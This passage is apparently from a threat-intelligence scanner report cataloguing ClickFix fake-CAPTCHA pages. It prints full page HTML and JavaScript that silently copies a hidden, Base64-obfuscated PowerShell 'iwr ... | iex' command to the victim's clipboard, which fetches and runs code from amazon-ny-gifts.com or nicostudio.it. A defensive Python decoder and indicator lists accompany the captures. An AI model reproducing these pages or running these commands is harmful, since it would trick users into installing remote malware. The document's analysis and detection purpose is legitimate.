font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
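The ClickFix captures on this page differ only in cosmetic details: the lucprofessional.com.br page above and the www.laborpartyjo.com page below stage `POWerShEll -W h ...` with the amazon-ny-gifts.com blob, while the capture at the top of this section stages `PowErsHeLL -W hiddEn ...` with a nicostudio.it blob. All of them copy the command to the clipboard with `document.execCommand("copy")` and decode a Base64 layer that wraps `iex (iwr '<url>' -UseBasicParsing).Content`. The Python below is an added analysis helper, not part of ClickGrab or of the captured pages: it pulls the `commandToRun` template literal out of a page's script, decodes the Base64 layer, recovers the second-stage URL and flags the hidden-window, `| iex` and clipboard-staging markers. The two sample pages are constructed minimal snippets that embed the script lines captured on this page; the function and result field names are my own.

```python
import base64
import re
from typing import Optional

# Matches the staged command as the captured pages build it in showVerifyWindow():
#   const commandToRun = `POWerShEll -W h "...FromBase64String('<b64>')... | iex"`;
# Casing of "powershell" and of the -W value varies between samples, so match case-insensitively.
COMMAND_RE = re.compile(r"commandToRun\s*=\s*`(?P<cmd>powershell[^`]*)`", re.IGNORECASE)
B64_RE = re.compile(r"FromBase64String\(\s*'(?P<b64>[A-Za-z0-9+/=]+)'\s*\)")
# "-W h", "-W hiddEn", "-WindowStyle Hidden": all keep the console window off screen.
HIDDEN_RE = re.compile(r"(?<!\S)-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)
IEX_RE = re.compile(r"\|\s*iex\b|\bInvoke-Expression\b", re.IGNORECASE)
# Second-stage fetch inside the decoded layer: iwr/irm followed by a quoted URL.
IWR_URL_RE = re.compile(
    r"\b(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod)\s+'?(?P<url>https?://[^'\s)]+)",
    re.IGNORECASE,
)


def analyze_clickfix_page(html: str) -> Optional[dict]:
    """Return details of the clipboard-staged PowerShell command in a ClickFix page, or None."""
    m = COMMAND_RE.search(html)
    if not m:
        return None
    cmd = m.group("cmd")

    # Peel the Base64 layer; a malformed blob is reported as undecodable rather than crashing.
    decoded = None
    b64 = B64_RE.search(cmd)
    if b64:
        try:
            decoded = base64.b64decode(b64.group("b64"), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            decoded = None

    url_match = IWR_URL_RE.search(decoded or "")
    return {
        "command": cmd,
        "hidden_window": bool(HIDDEN_RE.search(cmd)),
        "pipes_to_iex": bool(IEX_RE.search(cmd)),
        "decoded": decoded,
        "stage2_url": url_match.group("url") if url_match else None,
        # Both clipboard APIs are checked; the captured pages use the legacy execCommand path.
        "clipboard_hijack": 'execCommand("copy")' in html or "navigator.clipboard.writeText" in html,
    }


# Constructed sample: the script lines captured from lucprofessional.com.br / www.laborpartyjo.com,
# wrapped in a minimal page so the helper can be run offline.
SAMPLE_LABORPARTYJO = """<script>
function setClipboardCopyData(textToCopy){
  const tempTextArea = document.createElement("textarea");
  tempTextArea.value = textToCopy;
  document.body.append(tempTextArea);
  tempTextArea.select();
  document.execCommand("copy");
  document.body.removeChild(tempTextArea);
}
const commandToRun = `POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
</script>"""

# Constructed sample: the "-W hiddEn" variant captured at the top of this section.
SAMPLE_NICOSTUDIO = """<script>
document.execCommand("copy");
const commandToRun = `PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
</script>"""


if __name__ == "__main__":
    for name, page in (("laborpartyjo", SAMPLE_LABORPARTYJO), ("nicostudio", SAMPLE_NICOSTUDIO)):
        result = analyze_clickfix_page(page)
        print(name, result["stage2_url"], result["hidden_window"], result["pipes_to_iex"])
```

Run against a saved copy of a captured page, the `stage2_url` field is the indicator worth blocking and hunting for in proxy logs; `decoded` is what actually executes once the victim pastes into the Run dialog, so it is the string to compare across reports when clustering campaigns.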
https://www.first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
JSON Technical Data
{ "URL": "https://www.first-security-verden.de/", "URLs": [ "https://www.webgo.de/assets/images/misc/hazard-50x50.png", "https://www.webgo.de/assets/images/misc/hazard-50x50.png", "https://www.webgo.de/assets/images/logo.svg", "https://www.webgo.de/assets/images/misc/construction.png", "https://www.webgo.de/webhosting/" ], "HTML": "<html>\r\n<head>\r\n \r\n<title>Neue Domain bei der webgo GmbH</title>\r\n<style type=\"text/css\">\r\n \r\nbody {font-family: sans-serif;}\r\n \r\n.main {\r\nbackground: #ffffff; /* Old browsers */\r\nbackground: -moz-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* FF3.6+ */\r\nbackground: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e5e5e5)); /* Chrome,Safari4+ */\r\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Chrome10+,Safari5.1+ */\r\nbackground: -o-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Opera 11.10+ */\r\nbackground: -ms-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* IE10+ */\r\nbackground: linear-gradient(to bottom, #ffffff 0%,#e5e5e5 100%); /* W3C */\r\nheight: 540px;\r\nwidth: 1200px;\r\npadding: 20px;\r\nmargin: 30px auto;\r\n box-shadow: 0px 0 5px #555;\r\n \r\n}\r\n \r\n.hazard {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px;}\r\n.hazard2 {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px; position: relative; top: 140px;}\r\n \r\n.header {\r\n width: 100%;\r\n height: 68px;\r\n background-image: url(\"https://www.webgo.de/assets/images/logo.svg\");\r\n background-repeat:no-repeat;\r\n}\r\n.content {\r\nmargin: 20px 0 0 -20px;\r\nbox-shadow: 0px 0 0px #555;\r\nwidth: 100%;\r\nheight: 200px;\r\npadding: 20px;\r\nfont-size: 1.5em;\r\n \r\n}\r\n.footer {\r\n height: 32px;\r\n padding: 10px 0 0 0;\r\n position: relative;\r\n 
top:-90px;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"main\">\r\n <div class=\"header\"></div>\r\n <div class=\"hazard\"></div>\r\n <div class=\"content\">\r\n <div style=\"width: 50%; float: left;position: relative; top: 50px;\">Diese Domain wurde bei webgo f\u00fcr einen Kunden registriert. <br><br>Wenn Sie diese Seite sehen, ist Ihre Domain erreichbar. Im webgo Webspace Admin unter \"Paket-Verwaltung\" - \"Domainverwaltung\" sehen Sie, in welchen Ordner Ihre Domain aktuell zeigt. </div>\r\n <div style=\"width: 50%; float: left; position: relative; top: -128px;\"><center><img src=\"https://www.webgo.de/assets/images/misc/construction.png\"></center></div>\r\n </div>\r\n <div class=\"hazard2\"></div>\r\n <div class=\"footer\">Sollten Sie Inhaber dieser Domain sein, l\u00f6schen Sie diese <b>index.html</b> Datei, damit Ihre hochgeladene Seite angezeigt werden kann. <br>\r\n <span style=\"font-size: 0.7em; float: right; margin: -7px 0 0 0\"><a href=\"https://www.webgo.de/webhosting/\">Webhosting von webgo GmbH </a></span></div>\r\n </div>\r\n \r\n</body>\r\n</html>\n", "ThreatLevel": "None" }
https://www.laborpartyjo.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
{ "URL": "https://www.laborpartyjo.com/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
https://finocci.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://finocci.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://www.finocci.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://www.finocci.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://www.website.mypetapp.co.za/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
https://www.lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
https://thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
{ "URL": "https://thesignaturemag.salviatech.com/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
